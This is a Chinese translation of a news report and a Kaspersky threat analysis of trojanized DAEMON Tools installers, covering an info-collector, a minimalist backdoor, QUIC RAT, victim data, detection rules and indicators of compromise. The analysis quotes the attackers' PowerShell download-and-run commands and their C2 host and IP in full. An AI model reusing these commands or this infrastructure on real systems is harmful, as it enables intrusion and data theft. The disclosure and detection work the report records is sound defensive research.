卡巴斯基怀疑中国黑客在“广泛”攻击中向 Daemon Tools 植入了后门

来源: https://techcrunch.com/2026/05/05/kaspersky-suspects-chinese-hackers-planted-a-backdoor-into-daemon-tools-in-widespread-attack/

卡巴斯基的安全研究人员表示,他们发现流行且运行多年的 Windows 磁盘映像软件 Daemon Tools 中植入了一个恶意后门。

俄罗斯网络安全公司周二表示,从世界各地运行卡巴斯基杀毒软件的计算机收集的数据显示,一场“广泛的”攻击正在进行中,目标是数千台运行 Daemon Tools 的 Windows 计算机。

卡巴斯基实验室根据对恶意软件的分析,将这些黑客与一个讲中文的黑客组织联系起来。他们利用 Daemon Tools 中的后门程序,在零售、科研、制造等行业的十几台电脑以及政府系统中植入了其他恶意软件。卡巴斯基表示,这些特定电脑遭到入侵表明这是一次“有针对性的”攻击。

该公司表示,被针对的组织位于俄罗斯、白俄罗斯和泰国。

卡巴斯基表示,该后门最早于4月8日被发现。

卡巴斯基表示已联系了维护 Daemon Tools 的 Disc Soft 公司,但未透露开发商是否作出回应或采取了行动。卡巴斯基称,此次供应链攻击“仍在进行中”,这意味着黑客仍可在数千台运行该磁盘映像软件的计算机上植入恶意软件。

这是近几个月来针对热门软件开发商的一系列所谓“供应链”攻击中的最新一起。黑客越来越多地将目标对准那些开发广泛使用的代码和软件的开发者的账户,并滥用这些账户向所有依赖该软件的用户推送恶意代码。这种方法使得黑客能够在恶意代码以软件更新的形式传播时,一次性入侵大量计算机。

今年早些时候,与中国政府有关联的黑客劫持了流行的文本编辑软件 Notepad++,并向一些在东亚地区有业务往来的组织传播恶意软件。安全研究人员上个月还警告称,另一起攻击的目标是访问 CPUID 网站的用户,CPUID 是热门工具 HWMonitor 和 CPU-Z 的开发商。

TechCrunch 从 Daemon Tools 的网站下载了 Windows 安装程序,当我们使用在线恶意软件扫描服务 VirusTotal 检查该文件时,发现该文件似乎包含后门。

目前尚不清楚 macOS 版 Daemon Tools 是否受到感染,也不清楚 Disc Soft 开发的其他应用程序是否受到影响。

当被问及此事时,Disc Soft 的一位代表表示,他们“已经注意到该报道,目前正在调查情况”。

“我们的团队高度重视此事,正在积极评估并解决问题。目前,我们尚无法确认报告中提及的具体细节。但是,我们正在采取一切必要措施,消除任何潜在风险,并确保用户安全。”该代表表示。

卡巴斯基技术分析原文: https://securelist.com/tr/daemon-tools-backdoor/119654/

更新于 2026 年 5 月 6 日:披露后,供应商承认了该问题,并发布了旨在解决该问题的新软件版本。更新后的版本 12.6.0.2445 不再包含本文所述的恶意行为。

2026 年 5 月 6 日更新:使用 Kaspersky Anti Targeted Attack (KATA) 的 NDR 模块,增加了对网络流量中恶意活动的检测。

更新 2026 年 5 月 5 日:添加了 KEDR 专家提供的检测规则和示例,并使用我们的卡巴斯基托管检测和响应服务验证了恶意活动的检测。

发生了什么?

2026年5月初,我们发现用于挂载磁盘镜像的DAEMON Tools软件安装程序已被植入恶意载荷。这些安装程序从DAEMON Tools的官方网站分发,并使用DAEMON Tools开发者的数字证书进行签名。我们的分析显示,这些软件安装程序自2026年4月8日起被植入木马。具体而言,我们发现DAEMON Tools版本从12.5.0.2421到12.5.0.2434均已受到感染。在观察到的恶意植入文件中,我们发现了一些迹象,表明此次攻击背后的攻击者可能使用中文。我们已联系DAEMON Tools的开发公司AVB Disc Soft,以便采取进一步措施来应对此次攻击的影响。


从四月初开始,我们的遥测数据中观察到数千起涉及 DAEMON Tools 的感染尝试,影响范围遍及 100 多个国家/地区的个人和组织。然而,在所有受感染的机器中,我们仅观察到十几台机器部署了后续阶段的有效载荷。这些接收后续有效载荷的机器属于零售、科研、政府和制造机构——这表明此次供应链攻击具有针对性。

卡巴斯基解决方案可保护其用户免受通过 DAEMON Tools 供应链攻击部署的恶意载荷的侵害。

特洛伊木马化的二进制文件

我们的分析显示,对于 DAEMON Tools 版本 12.5.0.2421 至 12.5.0.2434,攻击者已成功入侵软件安装包中的以下二进制文件:

  • DTHelper.exe
  • DiscSoftBusServiceLite.exe
  • DTShellHlp.exe

这些文件位于 DAEMON Tools 的安装目录中,例如 /etc/ DAEMON Tools C:\Program Files\DAEMON Tools Lite 。值得注意的是,这些文件由 DAEMON Tools 的开发商 AVB Disc Soft 进行了数字签名。

每当这些二进制文件之一启动时(通常在机器启动时),一个后门程序就会被激活。该后门程序被植入到负责初始化 CRT 环境的启动代码中。后门程序在一个专用线程中运行,用于向以下 URL 发送 GET 请求:

https://env-check.daemontools[.]cc/2032716822411?s=<full computer name>

URL。用于通信的服务器是恶意服务器,其地址旨在抢注daemon-tools[.]cc 用于下载 DAEMON Tools 的合法域名。值得注意的是,根据 WHOIS 信息,该恶意服务器的域名注册于 3 月 27 日,大约在供应链攻击开始前一周。


服务器收到请求后,可能会返回一个 shell 命令,该命令将通过 cmd.exe 进程执行。我们观察到该 shell 命令具有以下模板:

cmd.exe /c powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107[.]76/’,‘C:\Windows\Temp<filename>.exe’)”&& %TEMP%<filename> &&del %TEMP%<filename>.exe"

从模板可以看出,这些 shell 命令用于下载和启动可执行有效载荷。我们已经见过多种类型的有效载荷,下面将进行描述。

信息收集员

我们观察到攻击者部署的第一个有效载荷是信息收集器。它是通过以下命令部署的:

cmd.exe /c powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107.76/env_check_script’,'C:\Windows\Temp\envchk.exe’)”&&C:\Windows\Temp\envchk.exe http://38.180.107.76/09505aca4f538bd&&del %TEMP%\envchk.exe

envchk.exe 文件(SHA1: 2d4eb55b01f59c62c6de9aacba9b47267d398fe4 )是一个用于收集扩展系统信息的 .NET 可执行文件。值得注意的是,其代码中包含中文字符串。虽然这可能暗示此次攻击是由讲中文的攻击者所为,但我们目前并未将 DAEMON Tools 的入侵归咎于任何特定攻击者。

信息收集器代码的屏幕截图,其中包含中文字符串

信息收集器收集的数据包括:

  • MAC 地址(第一个非零值);
  • 主机名;
  • DNS域名;
  • 正在运行的进程列表,用分号分隔;
  • 已安装软件列表,以分号分隔;
  • 系统区域设置。

此信息将发送到信息收集器命令行参数中指定的 C2 服务器。从上面的命令可以看出,服务器的地址是:

http://38.180.107[.]76/09505aca4f538bd

数据通过以下 POST 请求体传递:

a=&b=&c=&d=&e=&f=

极简主义后门

虽然我们观察到信息收集器试图部署在大量受感染的机器上,但我们也注意到攻击者试图向极少数机器(大约十几台)投放另一种有效载荷。基于此,我们高度确信信息收集器用于分析受感染机器,而分析结果将被用于有针对性地部署其他有效载荷。

我们观察到的此类有效载荷之一是极简后门。我们观察到它是通过以下命令部署的:

cmd.exe /c powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107.76/b3593ac2edb34f4d4d’,'C:\Windows\Temp\cdg.exe’)”&&powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107.76/368b1365bd9176b359’,'%TEMP%\cdg.tmp’)”&&%TEMP%\cdg.exe schedsvc.dll %TEMP%\cdg.tmp first_match&&del %TEMP%\cdg.exe&&del %TEMP%\cdg.tmp"

可以看出,该命令用于下载两个文件,cdg.execdg.tmpcdg.exe 进一步启动的文件是一个 shellcode 加载器,它打开cdg.tmp 文件,使用RC4 (使用最后一个参数中指定的密钥,first_match 在上面的例子中是)对其进行解密,并将其作为 shellcode 运行。


cdg.exe shellcode 加载器用法

这段 shellcode 代表后门主体。后门本身会向以下 URL 发送 POST 请求心跳:

http://38.180.107[.]76/79437f5edda13f9c066/version/check

URL。它的功能包括下载文件、运行 shell 命令和在内存中执行 shellcode 有效载荷。


这是一段反编译后的极简后门代码片段,用于执行命令。

奇怪的是,在某些情况下,我们观察到这个极简后门程序会与其他命令一起部署,例如以下命令:

cmd.exe /c powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107[.]76/407fbb423143f99fe0’,‘C:\ProgramData\Microsoft\mcrypto.chiper’)”&&powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107[.]76/07fbb423143f99fe07’,‘$appdata\Microsoft\mcrypto.dat’)”&&start rundll32.exe $appdata\Microsoft\mcrypto.chiper, mcrypto_clean

“cmd.exe /c powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107[.]76/407fbb423143f99fe0’,‘C:\Windows\Temp\crypto.dll’)”&&powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107[.]76/07fbb423143f99fe07’,‘$appdata\Microsoft\mcrypto.dat’)”&&start rundll32.exe %TEMP%\rypto.dll, mcrypto_clean”

值得注意的是,这些命令序列中存在拼写错误。在第一个命令序列中,“cipher”被拼写成了“chiper”,而在第二个命令序列中,“crypto.dll”文件名中的字母“c”被省略了。从命令中可以看出,由于这个拼写错误,后门程序无法启动——这很可能表明该后门程序是在实际操作过程中部署的。

QUIC RAT

在分析了攻击者如何尝试利用这个极简后门后,我们发现它被用于部署一个更为复杂的植入程序,我们将其命名为 QUIC RAT。虽然我们观察到极简后门后门被部署到十几台机器上,但我们确定 QUIC RAT 仅被用于攻击一个组织,即位于俄罗斯的一所教育机构。该 RAT 使用 C++ 编写,并采用控制流扁平化技术进行混淆,静态链接了 WolfSSL 库。此外,它还msquic.dll 在其.data 代码段中包含了合法库的主体部分。

该后门支持多种C2通信协议,包括HTTP、UDP、TCP、WSS、QUIC、DNS和HTTP/3。虽然分析仍在进行中,但我们发现QUIC RAT能够将有效载荷注入notepad.exe和conhost.exe进程。

受害者学

自4月8日首个被植入木马的DAEMON Tools版本部署以来,我们观察到数千次通过受感染二进制文件进行的恶意载荷部署尝试。值得注意的是,这是一个相当大的数字,表明此次攻击具有广泛的范围。

我们观察到这些部署发生在 100 多个国家和地区的个人和组织的机器上,其中大多数受害者位于俄罗斯、巴西、土耳其、西班牙、德国、法国、意大利和中国。

分析显示,10%的受影响系统属于企业和组织。攻击者试图仅使用信息收集有效载荷感染大多数受影响的机器。然而,另一种更为复杂的后门有效载荷仅在位于俄罗斯、白俄罗斯和泰国的十几台政府、科研、制造和零售机构的机器上被发现。这种将后门部署到一小部分受感染机器的方式清楚地表明,攻击者意图以有针对性的方式进行感染。然而,他们的意图——是网络间谍活动还是“大型猎杀” ——目前尚不清楚。

建议和结论

基于我们长期分析供应链攻击的经验,我们可以得出结论:攻击者以极其复杂的方式策划了此次 DAEMON Tools 入侵事件。例如,此次攻击的检测耗时约一个月,与我们 2023 年与网络安全社区共同研究的3CX供应链攻击事件的时间相当。鉴于此次攻击的高度复杂性,各组织必须仔细检查安装了 DAEMON Tools 的机器,以发现 4 月 8 日或之后发生的异常网络安全活动。

2026年至今仅过去了四个月,在这短短的时间里,我们观察到供应链攻击的报告数量不断增加。1月份我们调查了eScan , 2月份调查了Notepad++ ,4月份调查了CPU-Z,现在5月份又调查了DAEMON Tools。鉴于供应链攻击的激增,企业在选择安装软件时应格外谨慎。同时,这也表明,由于应用广泛且受信任,这些应用也可能成为攻击者的重要攻击途径,因为它们具有广泛的潜在影响。企业在制定网络安全战略时应牢记这一点,以确保“零信任”战略的有效实施。

卡巴斯基在2026年对大规模供应链安全事件的分析和发现做出了重大贡献,并通过Securelist上的威胁响应报告与网络安全社区分享了技术发现。卡巴斯基解决方案能够及时检测并防御此类攻击。

卡巴斯基解决方案的检测

卡巴斯基端点检测与响应专家 (Kaspersky Endpoint Detection and Response Expert)可有效检测所述恶意活动的各个阶段。本节介绍可能的检测场景:


攻击者通常使用 CMD 和 PowerShell 将恶意软件传播到目标主机以进行进一步执行。在本例中,当执行从 C2 服务器下载恶意文件的命令时,会触发Downloading_via_powershell_cmdletsDownloading_via_powershell_cmdlets_amsi规则,这些规则用于检测使用 PowerShell Cmdlets 下载文件的尝试。


检测此类活动的一种有效方法是监控对合法系统进程的可疑代码注入,尤其当注入源是来自 Temp、AppData 或 Public 等公共目录的可执行文件时。攻击者通常利用这些位置部署恶意组件,然后使用 WriteProcessMemory 和 CreateRemoteThread 等常用技术将恶意代码注入到受信任的进程中,从而隐藏执行过程、绕过安全控制并在系统中建立持久性。KEDR Expert 使用相关规则来检测此类活动。

卡巴斯基托管检测与响应服务也能检测到这种恶意活动。

检测此类攻击活动的另一种方法是监控网络流量是否存在特定异常。可以使用卡巴斯基反定向攻击软件 (KATA) 及其网络检测与报告 (NDR) 模块来检测恶意活动。

下图显示了 KATA NDR 界面,其中一条警报检测到通过 HTTP 协议从 Minimalistic 后门建立的 C2 连接。在这种情况下,触发了 Backdoor.Minimalistic.HTTP.C&C 规则,该规则用于检测健康检查请求。

妥协的迹象

受感染的 DAEMON Tools Lite 安装程序

9ccd769624de98eeeb12714ff1707ec4f5bf196d (12.5.0.2421)

50d47adb6dd45215c7cb4c68bae28b129ca09645 (12.5.0.2422)

0c1d3da9c7a651ba40b40e12d48ebd32b3f31820 (12.5.0.2423)

28b72576d67ae21d9587d782942628ea46dcc870 (12.5.0.2424)

46b90bf370e60d61075d3472828fdc0b85ab0492 (12.5.0.2430)

6325179f442e5b1a716580cd70dea644ac9ecd18 (12.5.0.2431)

bd8fbb5e6842df8683163adbd6a36136164eac58 (12.5.0.2433)

15ed5c3384e12fe4314ad6edbd1dcccf5ac1ee29 (12.5.0.2434)

修改后的 DiscSoftBusServiceLite.exe

524d2d92909eef80c406e87a0fc37d7bb4dadc14

427f1728682ebc7ffe3300fef67d0e3cb6b62948

8e7eb0f5ac60dd3b4a9474d2544348c3bda48045

00e2df8f42d14072e4385e500d4669ec783aa517

aea55e42c4436236278e5692d3dcbcbe5fe6ce0b

0456e2f5f56ec8ed16078941248e7cbba9f1c8eb

9a09ad7b7e9ff7a465aa1150541e231189911afb

8d435918d304fc38d54b104a13f2e33e8e598c82

64462f751788f529c1eb09023b26a47792ecdc54

C:\Windows\Temp\envchk.exe
2d4eb55b01f59c62c6de9aacba9b47267d398fe4

C:\Windows\Temp\cdg.exe
C:\Windows\Temp\imp.tmp
C:\Windows\Temp\piyu.exe
9dbfc23ebf36b3c0b56d2f93116abb32656c42e4

C:\Windows\Temp\core.tmp
C:\Windows\Temp\cdg.tmp

295ce86226b933e7262c2ce4b36bdd6c389aaaef

C:\ProgramData\Microsoft\mcrypto.chiper
C:\Windows\Temp\crypto.dll
98de8147394b74b27158e02ce9e7b0e25eb6e98a

C:\ProgramData\Microsoft\mcrypto.dat
$appdata\Microsoft\mcrypto.dat
2ecb292d27c36c1d4e47fb5cafa42af7ffbdda99

极简后门(从 mcrypto.dat 解密) a3e90653bd0a81ebe2ae387a67a59bb8d07ce7b5

极简后门(从 core.tmp / cdg.tmp 解密) 3ee71d75020b2634b2c23866211a0c91b942c8d4

C2
env-check.daemontools[.]cc
38.180.107[.]76